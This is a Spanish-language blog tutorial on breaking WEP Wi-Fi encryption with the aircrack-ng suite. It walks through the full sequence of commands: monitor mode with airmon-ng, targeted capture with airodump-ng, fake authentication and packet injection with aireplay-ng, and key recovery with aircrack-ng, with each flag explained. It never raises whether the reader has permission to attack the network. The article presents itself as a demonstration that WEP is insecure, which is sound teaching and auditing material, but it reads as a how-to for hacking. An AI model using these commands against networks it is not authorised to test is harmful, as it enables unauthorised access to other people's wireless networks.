DICCIONARIOS WPA

Tutoriales y recursos de hacking wifi

Hackear y crackear red wifi WEP

En este articulo explicaré como es posible pasar la seguridad de un modem WiFi que maneje encriptación de tipo WEP. Para ello utilizaremos una suite de herramientas llamada Aircrack-ng con la cual lograré demostrar que la encriptación WEP es bastante insegura.

¿Qué es wep? Según la wikipedia: WEP, acrónimo de Wired Equivalent Privacy o “Privacidad Equivalente a Cableado“, es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Los mensajes de difusión de las redes inalámbricas se transmiten por ondas de radio, lo que los hace más susceptibles, frente a las redes cableadas, de ser captados con relativa facilidad.

Básicamente es un sistema de encriptación para redes inalámbricas ya sea con autenticación abierta o con clave compartida.

Para poder atravesar esta seguridad se utilizan programas llamados Packet Sniffers y un crackeador WEP. Se captura una cantidad determinada de paquetes y luego mediante el crackeador se rompe el cifrado de la red. Un key cracker es un programa basado generalmente en matemáticas estadísticas que procesa los paquetes capturas para descifrar la clave WEP.

Es bastante simple y se los muestro a continuación, cualquier persona con una tarjeta inalámbrica y un sistema de comandos lo puedes hacer.

Para poder realizar lo anterior tenemos disponibles una serie de herramientas bastantes útiles, en esta situación utilizaremos una suite de herramientas que reúne todos los elementos necesarios para desencriptar el sistema WEP: aircrack-ng. Lo haremos en Linux, pero funciona en Windows también.

En este caso utilizaremos un sistema operativo basado en Debian: Ubuntu. Para instalar la suite aircrack-ng basta con ejecutar en linea de comandos:

sudo apt-get install aircrack-ng

El siguiente paso es poner nuestra tarjeta de red en modo monitor.. ¿Pero que es eso?

Modo Monitor, también llamado de Modo de Monitoramento o modo RFMON, permite que un ordenador con una placa con interfaz de red wireless (WNIC) realice monitoramento de todo el tráfico recibido de la red wireless.

Activamos:

airmon-ng start wlan0

Se activa en mon0, esto ya depende de tu tarjeta de red, para más información (por que este no es el tema) consulta SanGoogle.

Y monitoreamos:

airodump-ng mon0

Al insertar el ultimo comando nuestra tarjeta de red está captando y monitoreando todas las redes disponibles a nuestro alrededor. Saldrán varios elementos, información sobre las redes. Nos enfocaremos principalmente en BSSID (una clave estilo MAC), CH (el canal donde se encuentra la red), ENC (la encriptación debe de ser WEP por obvias razones) y el ESSID (básicamente el nombre de la red).

Para obtener esos datos, corremos:

airodump-ng -c [# canal] -w [ESSID] --bssid [BSSID] mon0

En la primera parte estamos utilizando la suite aircrack-ng.

-c Especificamos el canal.

-w Especificamos ESSID.

–bssid Habla por si solo.

mon0 De donde estamos monitoreando.

Es momento de inyectar paquetes a la red wifi. Basta con la herramienta aireplay (el cual inyecta tráfico para elevar la captura de vectores de inicio) para hacerlo.

aireplay-ng -1 6000 -a [BSSID] -h [tu MAC] mon0

Donde:

-1 6000 Es un tipo de ataque que genera una autenticación falsa con retraso.

-a Es el punto de acceso, enseguida ponemos el BSSID.

-h Es el source, aquí ponemos nuestra MAC address.

mon0 La interfaz que utilizamos.

Para ver lo que inyectamos:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h [tu MAC] mon0

-2 El tipo de ataque interactivo con los paquetes.

-p Aplica control en palabras.

-c Una MAC destino.

-b BSSID.

-h Es el source, aquí ponemos nuestra MAC address.

mon0 La interfaz que utilizamos.

Una vez realizados los pasos anteriores crackearemos. Lo haremos con un key cracker, la suite aircrack-ng lo tiene, así que lo activamos con el siguiente y simple comando.

aircrack-ng -z [ESSID]*.cap

Bastará que hayamos capturado suficientes paquetes para que el key cracker sea capaz de desencriptar la red WEP. En unos segundos o minutos (según sea el caso) aparecerá un mensaje como el siguiente:

KEY FOUND! [ 1234567890 ]

Espero que con este pequeño tip haya quedado claro que la encriptación WEP en las redes inalámbricas no es segura. Siempre hay métodos para desencriptar cualquier tipo de sistema pero la dificultad aumenta conforme a las tecnologías avanzan.

Your email address will not be published. Required fields are marked *

*